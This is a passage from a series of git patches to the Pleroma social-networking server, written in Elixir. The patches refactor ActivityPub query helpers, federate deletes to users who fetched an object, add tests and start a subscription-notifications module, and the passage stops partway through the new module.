!recipient_in_collection(ap_id, params["to"]) &&
!recipient_in_collection(ap_id, params["cc"])
- cc_list = extract_list(params["cc"])
-
- if need_splice do
- params
- |> Map.put("cc", [ap_id | cc_list])
+ if need_splice? do
+ cc_list = extract_list(params["cc"])
+ Map.put(params, "cc", [ap_id | cc_list])
else
params
end
@@ -139,7 +137,7 @@ def get_notified_from_object(%{"type" => type} = object) when type in @supported
"object" => object
}
- Notification.get_notified_from_activity(%Activity{data: fake_create_activity}, false)
+ get_notified_from_object(fake_create_activity)
end
def get_notified_from_object(object) do
@@ -188,9 +186,9 @@ def maybe_federate(_), do: :ok
Adds an id and a published data if they aren't there,
also adds it to an included object
"""
- def lazy_put_activity_defaults(map, fake \\ false) do
+ def lazy_put_activity_defaults(map, fake? \\ false) do
map =
- unless fake do
+ if not fake? do
%{data: %{"id" => context}, id: context_id} = create_context(map["context"])
map
@@ -207,7 +205,7 @@ def lazy_put_activity_defaults(map, fake \\ false) do
end
if is_map(map["object"]) do
- object = lazy_put_object_defaults(map["object"], map, fake)
+ object = lazy_put_object_defaults(map["object"], map, fake?)
%{map | "object" => object}
else
map
@@ -217,9 +215,9 @@ def lazy_put_activity_defaults(map, fake \\ false) do
@doc """
Adds an id and published date if they aren't there.
"""
- def lazy_put_object_defaults(map, activity \\ %{}, fake)
+ def lazy_put_object_defaults(map, activity \\ %{}, fake?)
- def lazy_put_object_defaults(map, activity, true = _fake) do
+ def lazy_put_object_defaults(map, activity, true = _fake?) do
map
|> Map.put_new_lazy("published", &make_date/0)
|> Map.put_new("id", "pleroma:fake_object_id")
@@ -228,7 +226,7 @@ def lazy_put_object_defaults(map, activity, true = _fake) do
|> Map.put_new("context_id", activity["context_id"])
end
- def lazy_put_object_defaults(map, activity, _fake) do
+ def lazy_put_object_defaults(map, activity, _fake?) do
map
|> Map.put_new_lazy("id", &generate_object_id/0)
|> Map.put_new_lazy("published", &make_date/0)
@@ -242,9 +240,7 @@ def lazy_put_object_defaults(map, activity, _fake) do
def insert_full_object(%{"object" => %{"type" => type} = object_data} = map)
when is_map(object_data) and type in @supported_object_types do
with {:ok, object} <- Object.create(object_data) do
- map =
- map
- |> Map.put("object", object.data["id"])
+ map = Map.put(map, "object", object.data["id"])
{:ok, map, object}
end
@@ -263,7 +259,7 @@ def get_existing_like(actor, %{data: %{"id" => id}}) do
|> Activity.Queries.by_actor()
|> Activity.Queries.by_object_id(id)
|> Activity.Queries.by_type("Like")
- |> Activity.Queries.limit(1)
+ |> limit(1)
|> Repo.one()
end
@@ -380,12 +376,11 @@ def update_follow_state(
%Activity{data: %{"actor" => actor, "object" => object}} = activity,
state
) do
- with new_data <-
- activity.data
- |> Map.put("state", state),
- changeset <- Changeset.change(activity, data: new_data),
- {:ok, activity} <- Repo.update(changeset),
- _ <- User.set_follow_state_cache(actor, object, state) do
+ new_data = Map.put(activity.data, "state", state)
+ changeset = Changeset.change(activity, data: new_data)
+
+ with {:ok, activity} <- Repo.update(changeset) do
+ User.set_follow_state_cache(actor, object, state)
{:ok, activity}
end
end
@@ -410,28 +405,14 @@ def make_follow_data(
end
def fetch_latest_follow(%User{ap_id: follower_id}, %User{ap_id: followed_id}) do
- query =
- from(
- activity in Activity,
- where:
- fragment(
- "? ->> 'type' = 'Follow'",
- activity.data
- ),
- where: activity.actor == ^follower_id,
- # this is to use the index
- where:
- fragment(
- "coalesce((?)->'object'->>'id', (?)->>'object') = ?",
- activity.data,
- activity.data,
- ^followed_id
- ),
- order_by: [fragment("? desc nulls last", activity.id)],
- limit: 1
- )
-
- Repo.one(query)
+ "Follow"
+ |> Activity.Queries.by_type()
+ |> where(actor: ^follower_id)
+ # this is to use the index
+ |> Activity.Queries.by_object_id(followed_id)
+ |> order_by([activity], fragment("? desc nulls last", activity.id))
+ |> limit(1)
+ |> Repo.one()
end
#### Announce-related helpers
@@ -439,23 +420,13 @@ def fetch_latest_follow(%User{ap_id: follower_id}, %User{ap_id: followed_id}) do
@doc """
Retruns an existing announce activity if the notice has already been announced
"""
- def get_existing_announce(actor, %{data: %{"id" => id}}) do
- query =
- from(
- activity in Activity,
- where: activity.actor == ^actor,
- # this is to use the index
- where:
- fragment(
- "coalesce((?)->'object'->>'id', (?)->>'object') = ?",
- activity.data,
- activity.data,
- ^id
- ),
- where: fragment("(?)->>'type' = 'Announce'", activity.data)
- )
-
- Repo.one(query)
+ def get_existing_announce(actor, %{data: %{"id" => ap_id}}) do
+ "Announce"
+ |> Activity.Queries.by_type()
+ |> where(actor: ^actor)
+ # this is to use the index
+ |> Activity.Queries.by_object_id(ap_id)
+ |> Repo.one()
end
@doc """
@@ -538,11 +509,13 @@ def add_announce_to_object(
object
) do
announcements =
- if is_list(object.data["announcements"]), do: object.data["announcements"], else: []
+ if is_list(object.data["announcements"]) do
+ Enum.uniq([actor | object.data["announcements"]])
+ else
+ [actor]
+ end
- with announcements <- [actor | announcements] |> Enum.uniq() do
- update_element_in_object("announcement", announcements, object)
- end
+ update_element_in_object("announcement", announcements, object)
end
def add_announce_to_object(_, object), do: {:ok, object}
@@ -570,28 +543,14 @@ def make_unfollow_data(follower, followed, follow_activity, activity_id) do
#### Block-related helpers
def fetch_latest_block(%User{ap_id: blocker_id}, %User{ap_id: blocked_id}) do
- query =
- from(
- activity in Activity,
- where:
- fragment(
- "? ->> 'type' = 'Block'",
- activity.data
- ),
- where: activity.actor == ^blocker_id,
- # this is to use the index
- where:
- fragment(
- "coalesce((?)->'object'->>'id', (?)->>'object') = ?",
- activity.data,
- activity.data,
- ^blocked_id
- ),
- order_by: [fragment("? desc nulls last", activity.id)],
- limit: 1
- )
-
- Repo.one(query)
+ "Block"
+ |> Activity.Queries.by_type()
+ |> where(actor: ^blocker_id)
+ # this is to use the index
+ |> Activity.Queries.by_object_id(blocked_id)
+ |> order_by([activity], fragment("? desc nulls last", activity.id))
+ |> limit(1)
+ |> Repo.one()
end
def make_block_data(blocker, blocked, activity_id) do
@@ -695,11 +654,11 @@ def fetch_ordered_collection(from, pages_left, acc \\ []) do
#### Report-related helpers
def update_report_state(%Activity{} = activity, state) when state in @supported_report_states do
- with new_data <- Map.put(activity.data, "state", state),
- changeset <- Changeset.change(activity, data: new_data),
- {:ok, activity} <- Repo.update(changeset) do
- {:ok, activity}
- end
+ new_data = Map.put(activity.data, "state", state)
+
+ activity
+ |> Changeset.change(data: new_data)
+ |> Repo.update()
end
def update_report_state(_, _), do: {:error, "Unsupported state"}
@@ -766,21 +725,13 @@ defp get_updated_targets(
end
def get_existing_votes(actor, %{data: %{"id" => id}}) do
- query =
- from(
- [activity, object: object] in Activity.with_preloaded_object(Activity),
- where: fragment("(?)->>'type' = 'Create'", activity.data),
- where: fragment("(?)->>'actor' = ?", activity.data, ^actor),
- where:
- fragment(
- "(?)->>'inReplyTo' = ?",
- object.data,
- ^to_string(id)
- ),
- where: fragment("(?)->>'type' = 'Answer'", object.data)
- )
-
- Repo.all(query)
+ actor
+ |> Activity.Queries.by_actor()
+ |> Activity.Queries.by_type("Create")
+ |> Activity.with_preloaded_object()
+ |> where([a, object: o], fragment("(?)->>'inReplyTo' = ?", o.data, ^to_string(id)))
+ |> where([a, object: o], fragment("(?)->>'type' = 'Answer'", o.data))
+ |> Repo.all()
end
defp maybe_put(map, _key, nil), do: map
diff --git a/test/user_test.exs b/test/user_test.exs
index a25b72f4e..206258fee 100644
--- a/test/user_test.exs
+++ b/test/user_test.exs
@@ -1081,7 +1081,7 @@ test "it deletes a user, all follow relationships and all activities", %{user: u
user_activities =
user.ap_id
- |> Activity.query_by_actor()
+ |> Activity.Queries.by_actor()
|> Repo.all()
|> Enum.map(fn act -> act.data["type"] end)
From 5bfbad13ad4dd009b172748d81f56ead21c700de Mon Sep 17 00:00:00 2001
From: Egor Kislitsyn
Date: Tue, 3 Sep 2019 21:33:02 +0700
Subject: [PATCH 053/272] Add more tests for Pleroma.Activity
---
test/activity_test.exs | 31 +++++++++++++++++++++++++++++++
1 file changed, 31 insertions(+)
diff --git a/test/activity_test.exs b/test/activity_test.exs
index 4152aaa7e..f9f789a76 100644
--- a/test/activity_test.exs
+++ b/test/activity_test.exs
@@ -185,4 +185,35 @@ test "all_by_ids_with_object/1" do
assert [%{id: ^id1, object: %Object{}}, %{id: ^id2, object: %Object{}}] = activities
end
+
+ test "get_by_id_with_object/1" do
+ %{id: id} = insert(:note_activity)
+
+ assert %Activity{id: ^id, object: %Object{}} = Activity.get_by_id_with_object(id)
+ end
+
+ test "get_by_ap_id_with_object/1" do
+ %{data: %{"id" => ap_id}} = insert(:note_activity)
+
+ assert %Activity{data: %{"id" => ^ap_id}, object: %Object{}} =
+ Activity.get_by_ap_id_with_object(ap_id)
+ end
+
+ test "get_by_id/1" do
+ %{id: id} = insert(:note_activity)
+
+ assert %Activity{id: ^id} = Activity.get_by_id(id)
+ end
+
+ test "all_by_actor_and_id/2" do
+ user = insert(:user)
+
+ {:ok, %{id: id1}} = Pleroma.Web.CommonAPI.post(user, %{"status" => "cofe"})
+ {:ok, %{id: id2}} = Pleroma.Web.CommonAPI.post(user, %{"status" => "cofefe"})
+
+ assert [] == Activity.all_by_actor_and_id(user, [])
+
+ assert [%Activity{id: ^id2}, %Activity{id: ^id1}] =
+ Activity.all_by_actor_and_id(user.ap_id, [id1, id2])
+ end
end
From ce23529d917c1830b270a29e774e4ed7768bfeff Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Fri, 13 Sep 2019 11:36:49 +0300
Subject: [PATCH 054/272] Use delivery info when federating deletes
---
lib/pleroma/delivery.ex | 4 ++
lib/pleroma/user.ex | 4 ++
lib/pleroma/web/activity_pub/publisher.ex | 15 ++++-
test/web/activity_pub/publisher_test.exs | 68 ++++++++++++++++++++++-
4 files changed, 89 insertions(+), 2 deletions(-)
diff --git a/lib/pleroma/delivery.ex b/lib/pleroma/delivery.ex
index f9a9e35cd..2e7c019fa 100644
--- a/lib/pleroma/delivery.ex
+++ b/lib/pleroma/delivery.ex
@@ -46,6 +46,10 @@ def get_or_create(object_id, user_id) do
end
end
+ # A hack because user delete activities have a fake id for whatever reason
+ # TODO: Get rid of this
+ def delete_all_by_object_id("pleroma:fake_object_id"), do: {0, []}
+
def delete_all_by_object_id(object_id) do
from(d in Delivery, where: d.object_id == ^object_id)
|> Repo.delete_all()
diff --git a/lib/pleroma/user.ex b/lib/pleroma/user.ex
index 9614acdab..785b22643 100644
--- a/lib/pleroma/user.ex
+++ b/lib/pleroma/user.ex
@@ -1627,6 +1627,10 @@ def is_internal_user?(%User{nickname: nil}), do: true
def is_internal_user?(%User{local: true, nickname: "internal." <> _}), do: true
def is_internal_user?(_), do: false
+ # A hack because user delete activities have a fake id for whatever reason
+ # TODO: Get rid of this
+ def get_delivered_users_by_object_id("pleroma:fake_object_id"), do: []
+
def get_delivered_users_by_object_id(object_id) do
from(u in User,
inner_join: delivery in assoc(u, :deliveries),
diff --git a/lib/pleroma/web/activity_pub/publisher.ex b/lib/pleroma/web/activity_pub/publisher.ex
index c97405690..db64fd2f6 100644
--- a/lib/pleroma/web/activity_pub/publisher.ex
+++ b/lib/pleroma/web/activity_pub/publisher.ex
@@ -5,9 +5,11 @@
defmodule Pleroma.Web.ActivityPub.Publisher do
alias Pleroma.Activity
alias Pleroma.Config
+ alias Pleroma.Delivery
alias Pleroma.HTTP
alias Pleroma.Instances
alias Pleroma.User
+ alias Pleroma.Object
alias Pleroma.Web.ActivityPub.Relay
alias Pleroma.Web.ActivityPub.Transmogrifier
@@ -107,7 +109,18 @@ defp recipients(actor, activity) do
{:ok, []}
end
- Pleroma.Web.Salmon.remote_users(actor, activity) ++ followers
+ fetchers =
+ with %Activity{data: %{"type" => "Delete"}} <- activity,
+ %Object{id: object_id} <- Object.normalize(activity),
+ fetchers <- User.get_delivered_users_by_object_id(object_id),
+ _ <- Delivery.delete_all_by_object_id(object_id) do
+ fetchers
+ else
+ _ ->
+ []
+ end
+
+ Pleroma.Web.Salmon.remote_users(actor, activity) ++ followers ++ fetchers
end
defp get_cc_ap_ids(ap_id, recipients) do
diff --git a/test/web/activity_pub/publisher_test.exs b/test/web/activity_pub/publisher_test.exs
index 36a39c84c..32b7a242c 100644
--- a/test/web/activity_pub/publisher_test.exs
+++ b/test/web/activity_pub/publisher_test.exs
@@ -3,15 +3,17 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.ActivityPub.PublisherTest do
- use Pleroma.DataCase
+ use Pleroma.Web.ConnCase
import Pleroma.Factory
import Tesla.Mock
import Mock
alias Pleroma.Activity
+ alias Pleroma.Object
alias Pleroma.Instances
alias Pleroma.Web.ActivityPub.Publisher
+ alias Pleroma.Web.CommonAPI
@as_public "https://www.w3.org/ns/activitystreams#Public"
@@ -262,5 +264,69 @@ test "it returns inbox for messages involving single recipients in total" do
})
)
end
+
+ test_with_mock "publishes a delete activity to peers who signed fetch requests to the create acitvity/object.",
+ Pleroma.Web.Federator.Publisher,
+ [:passthrough],
+ [] do
+ fetcher =
+ insert(:user,
+ local: false,
+ info: %{
+ ap_enabled: true,
+ source_data: %{"inbox" => "https://domain.com/users/nick1/inbox"}
+ }
+ )
+
+ another_fetcher =
+ insert(:user,
+ local: false,
+ info: %{
+ ap_enabled: true,
+ source_data: %{"inbox" => "https://domain2.com/users/nick1/inbox"}
+ }
+ )
+
+ actor = insert(:user)
+
+ note_activity = insert(:note_activity, user: actor)
+ object = Object.normalize(note_activity)
+
+ activity_path = String.trim_leading(note_activity.data["id"], Pleroma.Web.Endpoint.url())
+ object_path = String.trim_leading(object.data["id"], Pleroma.Web.Endpoint.url())
+
+ build_conn()
+ |> put_req_header("accept", "application/activity+json")
+ |> assign(:user, fetcher)
+ |> get(object_path)
+ |> json_response(200)
+
+ build_conn()
+ |> put_req_header("accept", "application/activity+json")
+ |> assign(:user, another_fetcher)
+ |> get(activity_path)
+ |> json_response(200)
+
+ {:ok, delete} = CommonAPI.delete(note_activity.id, actor)
+
+ res = Publisher.publish(actor, delete)
+ assert res == :ok
+
+ assert called(
+ Pleroma.Web.Federator.Publisher.enqueue_one(Publisher, %{
+ inbox: "https://domain.com/users/nick1/inbox",
+ actor: actor,
+ id: delete.data["id"]
+ })
+ )
+
+ assert called(
+ Pleroma.Web.Federator.Publisher.enqueue_one(Publisher, %{
+ inbox: "https://domain2.com/users/nick1/inbox",
+ actor: actor,
+ id: delete.data["id"]
+ })
+ )
+ end
end
end
From fb96facc32fb275efffeefa2892a1098ecd68b77 Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Fri, 13 Sep 2019 12:06:31 +0300
Subject: [PATCH 055/272] Remove unused functions and fix credo issues
---
lib/pleroma/delivery.ex | 16 ++--------------
lib/pleroma/web/activity_pub/publisher.ex | 2 +-
test/web/activity_pub/publisher_test.exs | 2 +-
3 files changed, 4 insertions(+), 16 deletions(-)
diff --git a/lib/pleroma/delivery.ex b/lib/pleroma/delivery.ex
index 2e7c019fa..ce8fb96f4 100644
--- a/lib/pleroma/delivery.ex
+++ b/lib/pleroma/delivery.ex
@@ -7,9 +7,9 @@ defmodule Pleroma.Delivery do
alias Pleroma.Delivery
alias Pleroma.FlakeId
- alias Pleroma.User
- alias Pleroma.Repo
alias Pleroma.Object
+ alias Pleroma.Repo
+ alias Pleroma.User
alias Pleroma.User
import Ecto.Changeset
@@ -39,13 +39,6 @@ def get(object_id, user_id) do
|> Repo.one()
end
- def get_or_create(object_id, user_id) do
- case get(object_id, user_id) do
- %Delivery{} = delivery -> {:ok, delivery}
- nil -> create(object_id, user_id)
- end
- end
-
# A hack because user delete activities have a fake id for whatever reason
# TODO: Get rid of this
def delete_all_by_object_id("pleroma:fake_object_id"), do: {0, []}
@@ -54,9 +47,4 @@ def delete_all_by_object_id(object_id) do
from(d in Delivery, where: d.object_id == ^object_id)
|> Repo.delete_all()
end
-
- def get_all_by_object_id(object_id) do
- from(d in Delivery, where: d.object_id == ^object_id)
- |> Repo.all()
- end
end
diff --git a/lib/pleroma/web/activity_pub/publisher.ex b/lib/pleroma/web/activity_pub/publisher.ex
index db64fd2f6..c39e89a6a 100644
--- a/lib/pleroma/web/activity_pub/publisher.ex
+++ b/lib/pleroma/web/activity_pub/publisher.ex
@@ -8,8 +8,8 @@ defmodule Pleroma.Web.ActivityPub.Publisher do
alias Pleroma.Delivery
alias Pleroma.HTTP
alias Pleroma.Instances
- alias Pleroma.User
alias Pleroma.Object
+ alias Pleroma.User
alias Pleroma.Web.ActivityPub.Relay
alias Pleroma.Web.ActivityPub.Transmogrifier
diff --git a/test/web/activity_pub/publisher_test.exs b/test/web/activity_pub/publisher_test.exs
index 32b7a242c..0ef97464e 100644
--- a/test/web/activity_pub/publisher_test.exs
+++ b/test/web/activity_pub/publisher_test.exs
@@ -10,8 +10,8 @@ defmodule Pleroma.Web.ActivityPub.PublisherTest do
import Mock
alias Pleroma.Activity
- alias Pleroma.Object
alias Pleroma.Instances
+ alias Pleroma.Object
alias Pleroma.Web.ActivityPub.Publisher
alias Pleroma.Web.CommonAPI
From 517017048316a52172d60d26b03beddb85af7b39 Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Fri, 13 Sep 2019 10:09:46 +0000
Subject: [PATCH 056/272] Apply suggestion to
lib/pleroma/web/activity_pub/activity_pub_controller.ex
---
lib/pleroma/web/activity_pub/activity_pub_controller.ex | 5 +----
1 file changed, 1 insertion(+), 4 deletions(-)
diff --git a/lib/pleroma/web/activity_pub/activity_pub_controller.ex b/lib/pleroma/web/activity_pub/activity_pub_controller.ex
index 009260d3f..025641722 100644
--- a/lib/pleroma/web/activity_pub/activity_pub_controller.ex
+++ b/lib/pleroma/web/activity_pub/activity_pub_controller.ex
@@ -26,10 +26,7 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubController do
plug(
Pleroma.Plugs.Cache,
- [
- query_params: false,
- tracking_fun: &Pleroma.Web.ActivityPub.ActivityPubController.track_object_fetch/2
- ]
+ [query_params: false, tracking_fun: &__MODULE__.track_object_fetch/2]
when action in [:activity, :object]
)
From 3896a51b8aefe6fe54251ffd559c636980faa87e Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Fri, 13 Sep 2019 10:09:56 +0000
Subject: [PATCH 057/272] Apply suggestion to
lib/pleroma/web/activity_pub/activity_pub_controller.ex
---
lib/pleroma/web/activity_pub/activity_pub_controller.ex | 5 ++---
1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/lib/pleroma/web/activity_pub/activity_pub_controller.ex b/lib/pleroma/web/activity_pub/activity_pub_controller.ex
index 025641722..4bd13defb 100644
--- a/lib/pleroma/web/activity_pub/activity_pub_controller.ex
+++ b/lib/pleroma/web/activity_pub/activity_pub_controller.ex
@@ -72,9 +72,8 @@ def object(conn, %{"uuid" => uuid}) do
end
def track_object_fetch(conn, object_id) do
- case conn.assigns[:user] do
- %User{id: user_id} -> Delivery.create(object_id, user_id)
- _ -> nil
+ with %{assigns: %{user: %User{id: user_id}}} <- conn do
+ Delivery.create(object_id, user_id)
end
conn
From ec5aaf5bd72c91db93a9dbfbe73b58cf7ae5e566 Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Fri, 13 Sep 2019 14:59:58 +0300
Subject: [PATCH 058/272] fix tests
---
.../mastodon_api/mastodon_api_controller_test.exs | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index 35c2236c8..f899d77d9 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -3626,16 +3626,16 @@ test "returns bad_request if missing required params", %{
res = post(conn, "/api/v1/accounts", valid_params)
assert json_response(res, 200)
- Enum.each(valid_params, fn {attr, _} ->
+ [{127,0,0,1}, {127,0,0,2}, {127,0,0,3}, {127,0,0,4}]
+ |> Stream.zip(valid_params)
+ |> Enum.each(fn {ip, {attr, _}} ->
res =
conn
- |> Map.put(
- :remote_ip,
- {:rand.uniform(15), :rand.uniform(15), :rand.uniform(15), :rand.uniform(15)}
- )
+ |> Map.put(:remote_ip, ip)
|> post("/api/v1/accounts", Map.delete(valid_params, attr))
+ |> json_response(400)
- assert json_response(res, 400) == %{"error" => "Missing parameters"}
+ assert res == %{"error" => "Missing parameters"}
end)
end
From bc3e8c033bbef303890ff6afa92d1fe365e530fb Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Fri, 13 Sep 2019 15:06:34 +0300
Subject: [PATCH 059/272] fix formatting
---
test/web/mastodon_api/mastodon_api_controller_test.exs | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index f899d77d9..58efbba38 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -3626,7 +3626,7 @@ test "returns bad_request if missing required params", %{
res = post(conn, "/api/v1/accounts", valid_params)
assert json_response(res, 200)
- [{127,0,0,1}, {127,0,0,2}, {127,0,0,3}, {127,0,0,4}]
+ [{127, 0, 0, 1}, {127, 0, 0, 2}, {127, 0, 0, 3}, {127, 0, 0, 4}]
|> Stream.zip(valid_params)
|> Enum.each(fn {ip, {attr, _}} ->
res =
From 2784962dba295ee35677e93996df53d1711e5768 Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Fri, 13 Sep 2019 15:23:03 +0000
Subject: [PATCH 060/272] Apply suggestion to
lib/pleroma/web/activity_pub/activity_pub_controller.ex
---
lib/pleroma/web/activity_pub/activity_pub_controller.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/web/activity_pub/activity_pub_controller.ex b/lib/pleroma/web/activity_pub/activity_pub_controller.ex
index 4bd13defb..70d4a5baf 100644
--- a/lib/pleroma/web/activity_pub/activity_pub_controller.ex
+++ b/lib/pleroma/web/activity_pub/activity_pub_controller.ex
@@ -130,7 +130,7 @@ defp maybe_set_tracking_data(conn, %Activity{data: %{"type" => "Create"}} = acti
assign(conn, :tracking_fun_data, object_id)
end
- defp maybe_set_tracking_data(conn, _activity), do: assign(conn, :tracking_fun_data, nil)
+ defp maybe_set_tracking_data(conn, _activity), do: conn
defp set_cache_ttl_for(conn, %Activity{object: object}) do
set_cache_ttl_for(conn, object)
From 05f8a066a107af2f7151aee8d85af97cf6a4835c Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Fri, 13 Sep 2019 15:23:26 +0000
Subject: [PATCH 061/272] Apply suggestion to lib/pleroma/delivery.ex
---
lib/pleroma/delivery.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/delivery.ex b/lib/pleroma/delivery.ex
index ce8fb96f4..38c148c34 100644
--- a/lib/pleroma/delivery.ex
+++ b/lib/pleroma/delivery.ex
@@ -31,7 +31,7 @@ def changeset(delivery, params \\ %{}) do
def create(object_id, user_id) do
%Delivery{}
|> changeset(%{user_id: user_id, object_id: object_id})
- |> Repo.insert()
+ |> Repo.insert(on_conflict: :nothing)
end
def get(object_id, user_id) do
From 8900cb68aef535dbf60de87fce47d85b91909077 Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Fri, 13 Sep 2019 15:25:15 +0000
Subject: [PATCH 062/272] Apply suggestion to
lib/pleroma/web/activity_pub/activity_pub_controller.ex
---
lib/pleroma/web/activity_pub/activity_pub_controller.ex | 2 ++
1 file changed, 2 insertions(+)
diff --git a/lib/pleroma/web/activity_pub/activity_pub_controller.ex b/lib/pleroma/web/activity_pub/activity_pub_controller.ex
index 70d4a5baf..01b34fb1d 100644
--- a/lib/pleroma/web/activity_pub/activity_pub_controller.ex
+++ b/lib/pleroma/web/activity_pub/activity_pub_controller.ex
@@ -71,6 +71,8 @@ def object(conn, %{"uuid" => uuid}) do
end
end
+ def track_object_fetch(conn, nil), do: conn
+
def track_object_fetch(conn, object_id) do
with %{assigns: %{user: %User{id: user_id}}} <- conn do
Delivery.create(object_id, user_id)
From 0bd2b85edbf3b7062570778649cf2b77cc7a0bce Mon Sep 17 00:00:00 2001
From: Roman Chvanikov
Date: Fri, 13 Sep 2019 18:25:27 +0300
Subject: [PATCH 063/272] Separate Subscription Notifications from regular
Notifications
---
lib/pleroma/notification.ex | 1 -
lib/pleroma/subscription_notification.ex | 266 ++++++++++++++++++
lib/pleroma/web/activity_pub/activity_pub.ex | 2 +
.../controllers/mastodon_api_controller.ex | 48 ++++
lib/pleroma/web/mastodon_api/mastodon_api.ex | 10 +
.../views/subscription_notification_view.ex | 61 ++++
.../web/pleroma_api/pleroma_api_controller.ex | 26 ++
lib/pleroma/web/push/impl.ex | 3 +-
lib/pleroma/web/router.ex | 28 ++
lib/pleroma/web/streamer.ex | 14 +-
...5028_create_subscription_notifications.exs | 15 +
test/notification_test.exs | 12 +-
.../mastodon_api_controller_test.exs | 192 +++++++++++++
test/web/mastodon_api/mastodon_api_test.exs | 4 +-
14 files changed, 670 insertions(+), 12 deletions(-)
create mode 100644 lib/pleroma/subscription_notification.ex
create mode 100644 lib/pleroma/web/mastodon_api/views/subscription_notification_view.ex
create mode 100644 priv/repo/migrations/20190824195028_create_subscription_notifications.exs
diff --git a/lib/pleroma/notification.ex b/lib/pleroma/notification.ex
index b7c880c51..716d98733 100644
--- a/lib/pleroma/notification.ex
+++ b/lib/pleroma/notification.ex
@@ -228,7 +228,6 @@ def get_notified_from_activity(
[]
|> Utils.maybe_notify_to_recipients(activity)
|> Utils.maybe_notify_mentioned_recipients(activity)
- |> Utils.maybe_notify_subscribers(activity)
|> Enum.uniq()
User.get_users_from_set(recipients, local_only)
diff --git a/lib/pleroma/subscription_notification.ex b/lib/pleroma/subscription_notification.ex
new file mode 100644
index 000000000..7ae25a7b1
--- /dev/null
+++ b/lib/pleroma/subscription_notification.ex
@@ -0,0 +1,266 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.SubscriptionNotification do
+ use Ecto.Schema
+
+ alias Pleroma.Activity
+ alias Pleroma.Object
+ alias Pleroma.Pagination
+ alias Pleroma.Repo
+ alias Pleroma.SubscriptionNotification
+ alias Pleroma.User
+ alias Pleroma.Web.CommonAPI.Utils
+ alias Pleroma.Web.Push
+ alias Pleroma.Web.Streamer
+
+ import Ecto.Query
+ import Ecto.Changeset
+
+ @type t :: %__MODULE__{}
+
+ schema "subscription_notifications" do
+ belongs_to(:user, User, type: Pleroma.FlakeId)
+ belongs_to(:activity, Activity, type: Pleroma.FlakeId)
+
+ timestamps()
+ end
+
+ def changeset(%SubscriptionNotification{} = notification, attrs) do
+ cast(notification, attrs, [])
+ end
+
+ def for_user_query(user, opts \\ []) do
+ query =
+ SubscriptionNotification
+ |> where(user_id: ^user.id)
+ |> where(
+ [n, a],
+ fragment(
+ "? not in (SELECT ap_id FROM users WHERE info->'deactivated' @> 'true')",
+ a.actor
+ )
+ )
+ |> join(:inner, [n], activity in assoc(n, :activity))
+ |> join(:left, [n, a], object in Object,
+ on:
+ fragment(
+ "(?->>'id') = COALESCE((? -> 'object'::text) ->> 'id'::text)",
+ object.data,
+ a.data
+ )
+ )
+ |> preload([n, a, o], activity: {a, object: o})
+
+ if opts[:with_muted] do
+ query
+ else
+ where(query, [n, a], a.actor not in ^user.info.muted_notifications)
+ |> where([n, a], a.actor not in ^user.info.blocks)
+ |> where(
+ [n, a],
+ fragment("substring(? from '.*://([^/]*)')", a.actor) not in ^user.info.domain_blocks
+ )
+ |> join(:left, [n, a], tm in Pleroma.ThreadMute,
+ on: tm.user_id == ^user.id and tm.context == fragment("?->>'context'", a.data)
+ )
+ |> where([n, a, o, tm], is_nil(tm.user_id))
+ end
+ end
+
+ def for_user(user, opts \\ %{}) do
+ user
+ |> for_user_query(opts)
+ |> Pagination.fetch_paginated(opts)
+ end
+
+ @doc """
+ Returns notifications for user received since given date.
+
+ ## Examples
+
+ iex> Pleroma.SubscriptionNotification.for_user_since(%Pleroma.User{}, ~N[2019-04-13 11:22:33])
+ [%Pleroma.SubscriptionNotification{}, %Pleroma.SubscriptionNotification{}]
+
+ iex> Pleroma.SubscriptionNotification.for_user_since(%Pleroma.User{}, ~N[2019-04-15 11:22:33])
+ []
+ """
+ @spec for_user_since(Pleroma.User.t(), NaiveDateTime.t()) :: [t()]
+ def for_user_since(user, date) do
+ from(n in for_user_query(user),
+ where: n.updated_at > ^date
+ )
+ |> Repo.all()
+ end
+
+ def clear_up_to(%{id: user_id} = _user, id) do
+ from(
+ n in SubscriptionNotification,
+ where: n.user_id == ^user_id,
+ where: n.id <= ^id
+ )
+ |> Repo.delete_all([])
+ end
+
+ def get(%{id: user_id} = _user, id) do
+ query =
+ from(
+ n in SubscriptionNotification,
+ where: n.id == ^id,
+ join: activity in assoc(n, :activity),
+ preload: [activity: activity]
+ )
+
+ notification = Repo.one(query)
+
+ case notification do
+ %{user_id: ^user_id} ->
+ {:ok, notification}
+
+ _ ->
+ {:error, "Cannot get notification"}
+ end
+ end
+
+ def clear(user) do
+ from(n in SubscriptionNotification, where: n.user_id == ^user.id)
+ |> Repo.delete_all()
+ end
+
+ def destroy_multiple(%{id: user_id} = _user, ids) do
+ from(n in SubscriptionNotification,
+ where: n.id in ^ids,
+ where: n.user_id == ^user_id
+ )
+ |> Repo.delete_all()
+ end
+
+ def dismiss(%{id: user_id} = _user, id) do
+ notification = Repo.get(SubscriptionNotification, id)
+
+ case notification do
+ %{user_id: ^user_id} ->
+ Repo.delete(notification)
+
+ _ ->
+ {:error, "Cannot dismiss notification"}
